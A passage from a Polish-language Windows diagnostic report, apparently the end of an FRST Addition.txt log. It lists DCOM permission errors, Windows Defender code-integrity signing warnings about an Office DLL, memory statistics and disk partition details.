udzielane uprawnienie Lokalny Aktywacja do aplikacji serwera COM z identyfikatorem klasy CLSID {D63B10C5-BB46-4990-A94F-E40B9D520160} i identyfikatorem aplikacji APPID {9CA88EE3-ACB7-47C8-AFC4-AB702511C276} użytkownikowi ZARZĄDZANIE NT\SYSTEM o identyfikatorze zabezpieczeń SID (S-1-5-18) z adresu LocalHost (użycie LRPC) działającemu w kontenerze aplikacji o identyfikatorze SID Niedostępny (Niedostępny). To uprawnienie zabezpieczeń można modyfikować przy użyciu narzędzia administracyjnego Usługi składowe. Error: (04/30/2017 01:37:30 PM) (Source: DCOM) (EventID: 10016) (User: ZARZĄDZANIE NT) Description: Zgodnie z ustawieniami uprawnienia właściwe dla aplikacji nie jest udzielane uprawnienie Lokalny Aktywacja do aplikacji serwera COM z identyfikatorem klasy CLSID {8D8F4F83-3594-4F07-8369-FC3C3CAE4919} i identyfikatorem aplikacji APPID {F72671A9-012C-4725-9D2F-2A4D32D65169} użytkownikowi ZARZĄDZANIE NT\SYSTEM o identyfikatorze zabezpieczeń SID (S-1-5-18) z adresu LocalHost (użycie LRPC) działającemu w kontenerze aplikacji o identyfikatorze SID Niedostępny (Niedostępny). To uprawnienie zabezpieczeń można modyfikować przy użyciu narzędzia administracyjnego Usługi składowe. Error: (04/30/2017 01:37:02 PM) (Source: DCOM) (EventID: 10010) (User: DESKTOP-QR2OCMA) Description: Serwer {9BA05972-F6A8-11CF-A442-00A0C90A8F39} nie zarejestrował się w modelu DCOM w wymaganym czasie. Error: (04/30/2017 01:37:02 PM) (Source: DCOM) (EventID: 10010) (User: DESKTOP-QR2OCMA) Description: Serwer {9BA05972-F6A8-11CF-A442-00A0C90A8F39} nie zarejestrował się w modelu DCOM w wymaganym czasie. Error: (04/30/2017 01:37:00 PM) (Source: DCOM) (EventID: 10016) (User: ZARZĄDZANIE NT) Description: Zgodnie z ustawieniami uprawnienia właściwe dla aplikacji nie jest udzielane uprawnienie Lokalny Aktywacja do aplikacji serwera COM z identyfikatorem klasy CLSID {D63B10C5-BB46-4990-A94F-E40B9D520160} i identyfikatorem aplikacji APPID {9CA88EE3-ACB7-47C8-AFC4-AB702511C276} użytkownikowi ZARZĄDZANIE NT\SYSTEM o identyfikatorze zabezpieczeń SID (S-1-5-18) z adresu LocalHost (użycie LRPC) działającemu w kontenerze aplikacji o identyfikatorze SID Niedostępny (Niedostępny). To uprawnienie zabezpieczeń można modyfikować przy użyciu narzędzia administracyjnego Usługi składowe. CodeIntegrity: =================================== Date: 2017-04-30 14:08:58.315 Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Common Files\microsoft shared\OFFICE12\MSOXMLMF.DLL that did not meet the Custom 3 / Antimalware signing level requirements. Date: 2017-03-16 21:30:55.902 Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Common Files\microsoft shared\OFFICE12\MSOXMLMF.DLL that did not meet the Custom 3 / Antimalware signing level requirements. Date: 2017-03-15 19:59:57.410 Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Common Files\microsoft shared\OFFICE12\MSOXMLMF.DLL that did not meet the Custom 3 / Antimalware signing level requirements. Date: 2017-03-11 22:26:09.572 Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Common Files\microsoft shared\OFFICE12\MSOXMLMF.DLL that did not meet the Custom 3 / Antimalware signing level requirements. Date: 2017-03-10 19:48:19.287 Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Common Files\microsoft shared\OFFICE12\MSOXMLMF.DLL that did not meet the Custom 3 / Antimalware signing level requirements. Date: 2017-03-09 17:57:15.713 Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Common Files\microsoft shared\OFFICE12\MSOXMLMF.DLL that did not meet the Custom 3 / Antimalware signing level requirements. Date: 2017-03-02 09:56:13.837 Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Common Files\microsoft shared\OFFICE12\MSOXMLMF.DLL that did not meet the Custom 3 / Antimalware signing level requirements. Date: 2017-02-26 19:52:30.910 Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Common Files\microsoft shared\OFFICE12\MSOXMLMF.DLL that did not meet the Custom 3 / Antimalware signing level requirements. Date: 2017-02-21 21:14:48.249 Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Common Files\microsoft shared\OFFICE12\MSOXMLMF.DLL that did not meet the Custom 3 / Antimalware signing level requirements. Date: 2017-02-21 14:50:03.918 Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Common Files\microsoft shared\OFFICE12\MSOXMLMF.DLL that did not meet the Custom 3 / Antimalware signing level requirements. ==================== Statystyki pamięci =========================== Procesor: Intel(R) Core(TM) i3-2310M CPU @ 2.10GHz Procent pamięci w użyciu: 49% Całkowita pamięć fizyczna: 4003.76 MB Dostępna pamięć fizyczna: 2025.75 MB Całkowita pamięć wirtualna: 4771.76 MB Dostępna pamięć wirtualna: 2755.12 MB ==================== Dyski ================================ Drive c: () (Fixed) (Total:136.23 GB) (Free:33.81 GB) NTFS Drive d: () (Fixed) (Total:96.17 GB) (Free:24.97 GB) NTFS ==================== MBR & Tablica partycji ================== ======================================================== Disk: 0 (MBR Code: Windows 7 or 8) (Size: 232.9 GB) (Disk ID: D480D90E) Partition 1: (Active) - (Size=500 MB) - (Type=07 NTFS) Partition 2: (Not Active) - (Size=136.2 GB) - (Type=07 NTFS) Partition 3: (Not Active) - (Size=96.2 GB) - (Type=07 NTFS) ==================== Koniec Addition.txt ============================